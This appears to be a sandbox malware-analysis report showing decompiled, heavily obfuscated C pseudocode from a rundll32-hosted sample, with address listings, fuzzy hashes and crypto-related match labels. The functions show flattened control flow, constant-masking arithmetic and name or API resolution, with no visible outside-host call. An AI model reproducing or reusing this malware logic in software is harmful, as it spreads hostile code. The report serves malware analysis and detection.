                                                                                                                      0x0018035a
                                                                                                                      0x00180362
                                                                                                                      0x00180367
                                                                                                                      0x0018036f
                                                                                                                      0x0018037c
                                                                                                                      0x0018037d
                                                                                                                      0x00180381
                                                                                                                      0x00180389
                                                                                                                      0x00180391
                                                                                                                      0x00180399
                                                                                                                      0x001803ac
                                                                                                                      0x001803b0
                                                                                                                      0x001803b8
                                                                                                                      0x001803c0
                                                                                                                      0x001803c8
                                                                                                                      0x001803d0
                                                                                                                      0x001803d8
                                                                                                                      0x001803e0
                                                                                                                      0x001803e8
                                                                                                                      0x001803f0
                                                                                                                      0x001803f8
                                                                                                                      0x00180400
                                                                                                                      0x00180408
                                                                                                                      0x00180408
                                                                                                                      0x00180416
                                                                                                                      0x00180449
                                                                                                                      0x00000000
                                                                                                                      0x00180418
                                                                                                                      0x0018041a
                                                                                                                      0x001804a9
                                                                                                                      0x001804ab
                                                                                                                      0x0018041c
                                                                                                                      0x00180422
                                                                                                                      0x00000000
                                                                                                                      0x00180424
                                                                                                                      0x0018043a
                                                                                                                      0x0018043f
                                                                                                                      0x00180442
                                                                                                                      0x00000000
                                                                                                                      0x00180442
                                                                                                                      0x00180422
                                                                                                                      0x0018041a
                                                                                                                      0x001804af
                                                                                                                      0x001804b7
                                                                                                                      0x001804b7
                                                                                                                      0x00180466
                                                                                                                      0x0018046b
                                                                                                                      0x0018046e
                                                                                                                      0x00180470
                                                                                                                      0x00180476
                                                                                                                      0x00000000
                                                                                                                      0x00180472
                                                                                                                      0x00180472
                                                                                                                      0x00000000
                                                                                                                      0x00180472
                                                                                                                      0x00000000
                                                                                                                      0x0018047b
                                                                                                                      0x0018047b
                                                                                                                      0x0018047b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G3$QwS@$_62
                                                                                                                      • API String ID: 0-451131340
                                                                                                                      • Opcode ID: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction ID: 9cf2f650c024299180005c43bac5d7a41182d849922caf9ef992dae72b7951d5
                                                                                                                      • Opcode Fuzzy Hash: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction Fuzzy Hash: 8D5168711083489FD388DF20C58582FBBE5FBD8758F505A1DF696A6261D3B1DA48CB83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00183D41 Relevance: 3.9, Strings: 3, Instructions: 127COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00183D41(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t102;
				void* _t110;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t132;
				signed int _t133;
				signed int* _t136;

				_t131 = _a8;
				_t117 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t102);
				_v64 = 0x9e44de;
				_t136 =  &(( &_v100)[4]);
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x000cb772;
				_t132 = 0;
				_v84 = 0x342048;
				_t119 = 0x9e632dd;
				_v84 = _v84 << 2;
				_t133 = 0x77;
				_v84 = _v84 / _t133;
				_v84 = _v84 ^ 0x00050c4a;
				_v68 = 0xcb0a16;
				_v68 = _v68 * 0x2c;
				_v68 = _v68 ^ 0x22ee5bf9;
				_v88 = 0x6d370;
				_v88 = _v88 << 2;
				_v88 = _v88 + 0xffff4ba7;
				_v88 = _v88 ^ 0x0017e1fc;
				_v96 = 0xa9311c;
				_v96 = _v96 + 0x677e;
				_v96 = _v96 << 6;
				_v96 = _v96 >> 1;
				_v96 = _v96 ^ 0x1536caa9;
				_v92 = 0x3ec146;
				_v92 = _v92 >> 1;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x01fa5034;
				_v100 = 0xc8b468;
				_v100 = _v100 + 0xabff;
				_v100 = _v100 + 0x496c;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x064ce6e5;
				_v72 = 0x40c3e5;
				_v72 = _v72 + 0xe4b1;
				_v72 = _v72 ^ 0x00481562;
				_v76 = 0xf7b9fc;
				_v76 = _v76 ^ 0x04753abe;
				_v76 = _v76 >> 8;
				_v76 = _v76 ^ 0x00058483;
				_v56 = 0xab3e00;
				_v56 = _v56 * 0x42;
				_v56 = _v56 ^ 0x2c2f6e9b;
				_v80 = 0x8577d2;
				_v80 = _v80 | 0xb985653c;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5dfa230b;
				_v60 = 0xdce2c4;
				_v60 = _v60 | 0x5395b845;
				_v60 = _v60 ^ 0x53d3ec0c;
				while(_t119 != 0x979dba8) {
					if(_t119 == 0x9e632dd) {
						_t119 = 0xa2b72cf;
						continue;
					} else {
						if(_t119 == 0xa2b72cf) {
							E001864C5(_v64, _v84, _v68, _v88, _t117,  &_v52);
							_t136 =  &(_t136[4]);
							_t119 = 0xe5d0333;
							continue;
						} else {
							if(_t119 != 0xe5d0333) {
								L10:
								__eflags = _t119 - 0xfc63b9d;
								if(__eflags != 0) {
									continue;
								}
							} else {
								_t115 = E0017B09F(_v96, _v92,  &_v52, _v100, _t131 + 0xc, _v72);
								_t136 =  &(_t136[4]);
								if(_t115 != 0) {
									_t119 = 0x979dba8;
									continue;
								}
							}
						}
					}
					return _t132;
				}
				_t110 = E0018B9B1(_v76, _v56, __eflags, _t131 + 0x10, _v80,  &_v52, _v60);
				_t136 =  &(_t136[4]);
				__eflags = _t110;
				_t132 =  !=  ? 1 : _t132;
				_t119 = 0xfc63b9d;
				goto L10;
			}
























                                                                                                                      0x00183d48
                                                                                                                      0x00183d4c
                                                                                                                      0x00183d4e
                                                                                                                      0x00183d4f
                                                                                                                      0x00183d53
                                                                                                                      0x00183d54
                                                                                                                      0x00183d55
                                                                                                                      0x00183d5a
                                                                                                                      0x00183d62
                                                                                                                      0x00183d65
                                                                                                                      0x00183d6c
                                                                                                                      0x00183d74
                                                                                                                      0x00183d76
                                                                                                                      0x00183d7e
                                                                                                                      0x00183d83
                                                                                                                      0x00183d8e
                                                                                                                      0x00183d96
                                                                                                                      0x00183d9a
                                                                                                                      0x00183da2
                                                                                                                      0x00183daf
                                                                                                                      0x00183db3
                                                                                                                      0x00183dbb
                                                                                                                      0x00183dc3
                                                                                                                      0x00183dc8
                                                                                                                      0x00183dd0
                                                                                                                      0x00183dd8
                                                                                                                      0x00183de0
                                                                                                                      0x00183de8
                                                                                                                      0x00183ded
                                                                                                                      0x00183df1
                                                                                                                      0x00183df9
                                                                                                                      0x00183e01
                                                                                                                      0x00183e05
                                                                                                                      0x00183e0a
                                                                                                                      0x00183e12
                                                                                                                      0x00183e1a
                                                                                                                      0x00183e22
                                                                                                                      0x00183e2a
                                                                                                                      0x00183e2f
                                                                                                                      0x00183e37
                                                                                                                      0x00183e3f
                                                                                                                      0x00183e47
                                                                                                                      0x00183e4f
                                                                                                                      0x00183e57
                                                                                                                      0x00183e5f
                                                                                                                      0x00183e64
                                                                                                                      0x00183e6c
                                                                                                                      0x00183e79
                                                                                                                      0x00183e7d
                                                                                                                      0x00183e85
                                                                                                                      0x00183e8d
                                                                                                                      0x00183e95
                                                                                                                      0x00183e9a
                                                                                                                      0x00183ea2
                                                                                                                      0x00183eaa
                                                                                                                      0x00183eb2
                                                                                                                      0x00183eba
                                                                                                                      0x00183ec4
                                                                                                                      0x00183f28
                                                                                                                      0x00000000
                                                                                                                      0x00183ec6
                                                                                                                      0x00183ecc
                                                                                                                      0x00183f19
                                                                                                                      0x00183f1e
                                                                                                                      0x00183f21
                                                                                                                      0x00000000
                                                                                                                      0x00183ece
                                                                                                                      0x00183ed4
                                                                                                                      0x00183f5d
                                                                                                                      0x00183f5d
                                                                                                                      0x00183f63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00183eda
                                                                                                                      0x00183ef3
                                                                                                                      0x00183ef8
                                                                                                                      0x00183efd
                                                                                                                      0x00183eff
                                                                                                                      0x00000000
                                                                                                                      0x00183eff
                                                                                                                      0x00183efd
                                                                                                                      0x00183ed4
                                                                                                                      0x00183ecc
                                                                                                                      0x00183f72
                                                                                                                      0x00183f72
                                                                                                                      0x00183f48
                                                                                                                      0x00183f4f
                                                                                                                      0x00183f53
                                                                                                                      0x00183f55
                                                                                                                      0x00183f58
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H 4$lI$~g
                                                                                                                      • API String ID: 0-1574228674
                                                                                                                      • Opcode ID: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction ID: e9eb0ecdabe4407b57b52dc9f887b07e078069dbc50f91f3a2ded4238de3248d
                                                                                                                      • Opcode Fuzzy Hash: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction Fuzzy Hash: EE5134B15083419FC758DF25848981BBBF5FBD4B48F404A1DFAA696260D3B1CA09CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00176A1F Relevance: 3.9, Strings: 3, Instructions: 126COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00176A1F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t133;
				void* _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				intOrPtr _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				void* _t161;

				_t158 =  *0x195c94; // 0x0
				_v8 = 0x584755;
				_t137 = __ecx;
				_t2 =  &_v8; // 0x584755
				_t159 = _t158 + 0x230;
				_t139 = 0x64;
				_v8 =  *_t2 * 0x67;
				_v8 = _v8 + 0xffff4b67;
				_v8 = _v8 ^ 0xe76daef6;
				_v8 = _v8 ^ 0xc4ee506c;
				_v28 = 0x9e8b87;
				_v28 = _v28 + 0x75d;
				_v28 = _v28 / _t139;
				_v28 = _v28 ^ 0x00079f8c;
				_v24 = 0xc311ab;
				_v24 = _v24 + 0xffffbeea;
				_v24 = _v24 | 0xf92f35a0;
				_v24 = _v24 ^ 0xf9e35170;
				_v44 = 0x977698;
				_v44 = _v44 + 0x51f5;
				_v44 = _v44 ^ 0x0096f96a;
				_v32 = 0xe7cab8;
				_v32 = _v32 | 0xaa1208f4;
				_t140 = 0x17;
				_v32 = _v32 / _t140;
				_v32 = _v32 ^ 0x076e046c;
				_v12 = 0x2eec3f;
				_v12 = _v12 + 0xffffb819;
				_v12 = _v12 + 0xffff37c9;
				_t141 = 0x68;
				_v12 = _v12 / _t141;
				_v12 = _v12 ^ 0x000eef91;
				_v56 = 0x530307;
				_v56 = _v56 | 0x0fbda9c8;
				_v56 = _v56 ^ 0x0ffdd502;
				_v52 = 0x5d35c5;
				_v52 = _v52 + 0xd27c;
				_v52 = _v52 ^ 0x0055f8de;
				_v48 = 0x6ef6d5;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x0035703d;
				_v16 = 0x82f5d;
				_v16 = _v16 << 0xd;
				_v16 = _v16 + 0xa18d;
				_v16 = _v16 + 0xffffcd20;
				_v16 = _v16 ^ 0x05eb1b3e;
				_v20 = 0xcf26b;
				_v20 = _v20 | 0xbebffeb7;
				_v20 = _v20 ^ 0xbebf7f31;
				_v60 = 0x60d0b7;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0017c790;
				_v40 = 0xb2c22;
				_v40 = _v40 ^ 0x2c2f8cde;
				_v40 = _v40 + 0xffffbcf4;
				_v40 = _v40 ^ 0x2c2f98f1;
				_v36 = 0x14b711;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 | 0x6b3fd2c1;
				_v36 = _v36 ^ 0x6b3a1312;
				while(1) {
					_t160 =  *_t159;
					if(_t160 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t160 + 0x30)) == 0) {
						L4:
						 *_t159 =  *_t160;
						_t133 = E001768DE(_v20, _v60, _v40, _v36, _t160);
						_t161 = _t161 + 0xc;
					} else {
						_t133 = E00175E0B( *((intOrPtr*)(_t160 + 0x24)), _t137, _v28, _v24);
						if(_t133 != _v8) {
							_t159 = _t160;
						} else {
							 *((intOrPtr*)(_t160 + 0xc))( *((intOrPtr*)(_t160 + 0x30)), 0, 0);
							E0017F88A(_v44, _v32, _v12,  *((intOrPtr*)(_t160 + 0x30)));
							E00184DAD(_v56, _v52,  *((intOrPtr*)(_t160 + 0x24)), _v48, _v16);
							_t161 = _t161 + 0x14;
							goto L4;
						}
					}
				}
				return _t133;
			}


























                                                                                                                      0x00176a28
                                                                                                                      0x00176a30
                                                                                                                      0x00176a37
                                                                                                                      0x00176a39
                                                                                                                      0x00176a3d
                                                                                                                      0x00176a45
                                                                                                                      0x00176a48
                                                                                                                      0x00176a4b
                                                                                                                      0x00176a52
                                                                                                                      0x00176a59
                                                                                                                      0x00176a60
                                                                                                                      0x00176a67
                                                                                                                      0x00176a75
                                                                                                                      0x00176a78
                                                                                                                      0x00176a7f
                                                                                                                      0x00176a86
                                                                                                                      0x00176a8d
                                                                                                                      0x00176a94
                                                                                                                      0x00176a9b
                                                                                                                      0x00176aa2
                                                                                                                      0x00176aa9
                                                                                                                      0x00176ab0
                                                                                                                      0x00176ab7
                                                                                                                      0x00176ac1
                                                                                                                      0x00176ac6
                                                                                                                      0x00176acb
                                                                                                                      0x00176ad2
                                                                                                                      0x00176ad9
                                                                                                                      0x00176ae0
                                                                                                                      0x00176aea
                                                                                                                      0x00176aed
                                                                                                                      0x00176af0
                                                                                                                      0x00176af7
                                                                                                                      0x00176afe
                                                                                                                      0x00176b05
                                                                                                                      0x00176b0c
                                                                                                                      0x00176b13
                                                                                                                      0x00176b1a
                                                                                                                      0x00176b21
                                                                                                                      0x00176b28
                                                                                                                      0x00176b2b
                                                                                                                      0x00176b32
                                                                                                                      0x00176b39
                                                                                                                      0x00176b3d
                                                                                                                      0x00176b44
                                                                                                                      0x00176b4b
                                                                                                                      0x00176b52
                                                                                                                      0x00176b59
                                                                                                                      0x00176b60
                                                                                                                      0x00176b67
                                                                                                                      0x00176b6e
                                                                                                                      0x00176b72
                                                                                                                      0x00176b79
                                                                                                                      0x00176b80
                                                                                                                      0x00176b87
                                                                                                                      0x00176b8e
                                                                                                                      0x00176b95
                                                                                                                      0x00176b9c
                                                                                                                      0x00176ba0
                                                                                                                      0x00176ba7
                                                                                                                      0x00176c18
                                                                                                                      0x00176c18
                                                                                                                      0x00176c1c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00176bb4
                                                                                                                      0x00176bff
                                                                                                                      0x00176c05
                                                                                                                      0x00176c10
                                                                                                                      0x00176c15
                                                                                                                      0x00176bb6
                                                                                                                      0x00176bc1
                                                                                                                      0x00176bcb
                                                                                                                      0x00176c25
                                                                                                                      0x00176bcd
                                                                                                                      0x00176bd4
                                                                                                                      0x00176be3
                                                                                                                      0x00176bf7
                                                                                                                      0x00176bfc
                                                                                                                      0x00000000
                                                                                                                      0x00176bfc
                                                                                                                      0x00176bcb
                                                                                                                      0x00176bb4
                                                                                                                      0x00176c24

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =p5$?.$UGX
                                                                                                                      • API String ID: 0-1320111276
                                                                                                                      • Opcode ID: 2db516d4d64a02e0246918ecf0dc254d85751fbfdfea19104cfcff6ea366f0c9
                                                                                                                      • Instruction ID: bd9d8cc3b5a5a3c017c2df36b71427ad7560517af483c252fabe083878e088ef
                                                                                                                      • Opcode Fuzzy Hash: 2db516d4d64a02e0246918ecf0dc254d85751fbfdfea19104cfcff6ea366f0c9
                                                                                                                      • Instruction Fuzzy Hash: FD512072D01709EBCB58CFA4D98A9DEBFB2FB58328F208059D506B6260D7B51A45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017C850 Relevance: 3.9, Strings: 3, Instructions: 125COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0017C850(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v328;
				char _t126;
				void* _t128;
				signed int _t129;
				void* _t133;
				signed int _t135;
				signed int _t136;
				char* _t137;
				intOrPtr* _t154;

				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v68 = 0xeb7817;
				_v44 = 0x4dbb17;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000af917;
				_v12 = 0xca90c;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 | 0x67e1d035;
				_v12 = _v12 ^ 0x67ebacbe;
				_v32 = 0xdd0ad5;
				_v32 = _v32 >> 6;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x00040440;
				_v16 = 0xaefc2a;
				_v16 = _v16 ^ 0x05a88ae0;
				_t154 = __ecx;
				_t135 = 0x4a;
				_v16 = _v16 / _t135;
				_v16 = _v16 | 0x6472a2d9;
				_v16 = _v16 ^ 0x647c73c3;
				_v8 = 0x7aea22;
				_t136 = 0x5f;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x0003680c;
				_v28 = 0xd7a14b;
				_v28 = _v28 >> 1;
				_v28 = _v28 | 0x0e275eed;
				_v28 = _v28 ^ 0x0e6be1b9;
				_v56 = 0x693eb0;
				_t137 =  &_v328;
				_v56 = _v56 / _t136;
				_v56 = _v56 ^ 0x00052716;
				_v52 = 0x6599ea;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x659cef3f;
				_v36 = 0xaf3092;
				_v36 = _v36 + 0xffffd3bf;
				_v36 = _v36 ^ 0x419856f6;
				_v36 = _v36 ^ 0x413f6f4c;
				_v40 = 0x56314e;
				_v40 = _v40 ^ 0x0d0339a4;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x0068e9be;
				_v20 = 0xd689b7;
				_v20 = _v20 >> 1;
				_v20 = _v20 + 0x3668;
				_v20 = _v20 ^ 0x006dcd8c;
				_v24 = 0x36edf6;
				_v24 = _v24 + 0x231d;
				_v24 = _v24 ^ 0xb40b6ffd;
				_v24 = _v24 ^ 0xb434c03a;
				_v48 = 0x867594;
				_v48 = _v48 * 0x3a;
				_v48 = _v48 ^ 0x1e7cd6f5;
				while(1) {
					_t126 =  *_t154;
					if(_t126 == 0) {
						break;
					}
					if(_t126 == 0x2e) {
						 *_t137 = 0;
					} else {
						 *_t137 = _t126;
						_t137 = _t137 + 1;
						_t154 = _t154 + 1;
						continue;
					}
					L6:
					_t128 = E001859B7(_v44, _v12,  &_v328, _v32);
					_t155 = _t128;
					if(_t128 != 0) {
						L8:
						_t129 = E0018FE5E(_v56, _t154 + 1, _v52, _v36);
						_push(_v48);
						_push(_v24);
						_push(_v20);
						_push(_v40);
						return E0017F2C1(_t155, _t129 ^ 0x3e95e426);
					}
					_t133 = E0018F949(_v16, _v8,  &_v328, _v28);
					_t155 = _t133;
					if(_t133 != 0) {
						goto L8;
					}
					return _t133;
				}
				goto L6;
			}




























                                                                                                                      0x0017c859
                                                                                                                      0x0017c85f
                                                                                                                      0x0017c863
                                                                                                                      0x0017c86a
                                                                                                                      0x0017c871
                                                                                                                      0x0017c875
                                                                                                                      0x0017c87c
                                                                                                                      0x0017c883
                                                                                                                      0x0017c887
                                                                                                                      0x0017c88b
                                                                                                                      0x0017c892
                                                                                                                      0x0017c899
                                                                                                                      0x0017c8a0
                                                                                                                      0x0017c8a4
                                                                                                                      0x0017c8a8
                                                                                                                      0x0017c8af
                                                                                                                      0x0017c8b6
                                                                                                                      0x0017c8c4
                                                                                                                      0x0017c8c6
                                                                                                                      0x0017c8cb
                                                                                                                      0x0017c8d0
                                                                                                                      0x0017c8d7
                                                                                                                      0x0017c8de
                                                                                                                      0x0017c8e9
                                                                                                                      0x0017c8ea
                                                                                                                      0x0017c8ed
                                                                                                                      0x0017c8f1
                                                                                                                      0x0017c8f5
                                                                                                                      0x0017c8fc
                                                                                                                      0x0017c903
                                                                                                                      0x0017c906
                                                                                                                      0x0017c90d
                                                                                                                      0x0017c914
                                                                                                                      0x0017c920
                                                                                                                      0x0017c926
                                                                                                                      0x0017c929
                                                                                                                      0x0017c930
                                                                                                                      0x0017c937
                                                                                                                      0x0017c93b
                                                                                                                      0x0017c942
                                                                                                                      0x0017c949
                                                                                                                      0x0017c950
                                                                                                                      0x0017c957
                                                                                                                      0x0017c95e
                                                                                                                      0x0017c965
                                                                                                                      0x0017c96c
                                                                                                                      0x0017c970
                                                                                                                      0x0017c977
                                                                                                                      0x0017c97e
                                                                                                                      0x0017c981
                                                                                                                      0x0017c988
                                                                                                                      0x0017c98f
                                                                                                                      0x0017c996
                                                                                                                      0x0017c99d
                                                                                                                      0x0017c9a4
                                                                                                                      0x0017c9ab
                                                                                                                      0x0017c9b6
                                                                                                                      0x0017c9b9
                                                                                                                      0x0017c9ca
                                                                                                                      0x0017c9ca
                                                                                                                      0x0017c9ce
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017c9c4
                                                                                                                      0x0017c9d2
                                                                                                                      0x0017c9c6
                                                                                                                      0x0017c9c6
                                                                                                                      0x0017c9c8
                                                                                                                      0x0017c9c9
                                                                                                                      0x00000000
                                                                                                                      0x0017c9c9
                                                                                                                      0x0017c9d5
                                                                                                                      0x0017c9e5
                                                                                                                      0x0017c9ea
                                                                                                                      0x0017c9f0
                                                                                                                      0x0017ca0f
                                                                                                                      0x0017ca1b
                                                                                                                      0x0017ca20
                                                                                                                      0x0017ca2a
                                                                                                                      0x0017ca2f
                                                                                                                      0x0017ca32
                                                                                                                      0x00000000
                                                                                                                      0x0017ca3a
                                                                                                                      0x0017ca02
                                                                                                                      0x0017ca07
                                                                                                                      0x0017ca0d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017ca42
                                                                                                                      0x0017ca42
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "z$Lo?A$N1V
                                                                                                                      • API String ID: 0-1513724126
                                                                                                                      • Opcode ID: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction ID: bd917bf32e1dfa64cbd5fadd74757b7fd48d42b711bd6c0bf7c68767c1d23581
                                                                                                                      • Opcode Fuzzy Hash: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction Fuzzy Hash: 10513272C0121EEBCF09CFA5D94A6EEFBB1FB54318F208159D511B6260D7B50A09CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017B821 Relevance: 3.9, Strings: 3, Instructions: 122COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0017B821() {
				signed int _v4;
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t108;
				intOrPtr _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				intOrPtr* _t116;
				void* _t117;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v40;
				_v8 = 0x113b84;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x00044f92;
				_v36 = 0x188bc5;
				_v36 = _v36 * 0x48;
				_v36 = _v36 + 0xffff17a0;
				_t129 = 0x184d0e0;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x33821a89;
				_v28 = 0x501440;
				_v28 = _v28 + 0x91aa;
				_v28 = _v28 ^ 0x04b9c112;
				_v28 = _v28 ^ 0x04ea9889;
				_v32 = 0xb3d9a7;
				_t113 = 0x1d;
				_v32 = _v32 * 0x13;
				_v32 = _v32 * 0x6a;
				_v32 = _v32 ^ 0x86e7717c;
				_v40 = 0x7a3277;
				_t30 =  &_v40; // 0x7a3277
				_v40 =  *_t30 * 0x26;
				_v40 = _v40 + 0x92c7;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x89042107;
				_v12 = 0xe6e512;
				_v12 = _v12 / _t113;
				_v12 = _v12 ^ 0x0000e0e8;
				_v16 = 0xf852d4;
				_t114 = 0x7e;
				_v16 = _v16 / _t114;
				_v16 = _v16 ^ 0x2a7b237e;
				_v16 = _v16 ^ 0x2a71b8af;
				_v20 = 0xa37a15;
				_v20 = _v20 + 0xffff21a5;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x000b71fe;
				_v4 = 0x3aba4b;
				_v4 = _v4 ^ 0x2eee7843;
				_v4 = _v4 ^ 0x2ed9fad0;
				_v24 = 0x4dcf39;
				_t115 = 0x4a;
				_v24 = _v24 / _t115;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x434ce119;
				_t116 =  *0x195208; // 0x0
				do {
					while(_t129 != 0x184d0e0) {
						if(_t129 == 0x7e35d81) {
							_t108 = E00184EFF(E001899AA, _v16, _t116, _t116, _v20, _v4, _t116, _v24, 0);
							_t116 =  *0x195208; // 0x0
							 *((intOrPtr*)(_t116 + 0x14)) = _t108;
						} else {
							if(_t129 != 0xb90d6f1) {
								goto L6;
							} else {
								_push(_v12);
								_push(_v40);
								_t111 = E001811FC(_v32);
								_t116 =  *0x195208; // 0x0
								_t131 = _t131 - 0xc + 0x14;
								_t129 = 0x7e35d81;
								 *_t116 = _t111;
								continue;
							}
						}
						L9:
						return 0 | _t116 != 0x00000000;
					}
					_push(_t116);
					_push(_t116);
					_t117 = 0x18;
					_t116 = E00183512(_t117);
					_t129 = 0xb90d6f1;
					 *0x195208 = _t116;
					L6:
				} while (_t129 != 0x93e05db);
				goto L9;
			}






















                                                                                                                      0x0017b821
                                                                                                                      0x0017b824
                                                                                                                      0x0017b82e
                                                                                                                      0x0017b833
                                                                                                                      0x0017b83b
                                                                                                                      0x0017b84c
                                                                                                                      0x0017b855
                                                                                                                      0x0017b85d
                                                                                                                      0x0017b85f
                                                                                                                      0x0017b869
                                                                                                                      0x0017b876
                                                                                                                      0x0017b87e
                                                                                                                      0x0017b886
                                                                                                                      0x0017b88e
                                                                                                                      0x0017b896
                                                                                                                      0x0017b8a5
                                                                                                                      0x0017b8a8
                                                                                                                      0x0017b8b1
                                                                                                                      0x0017b8b5
                                                                                                                      0x0017b8bd
                                                                                                                      0x0017b8c5
                                                                                                                      0x0017b8ca
                                                                                                                      0x0017b8ce
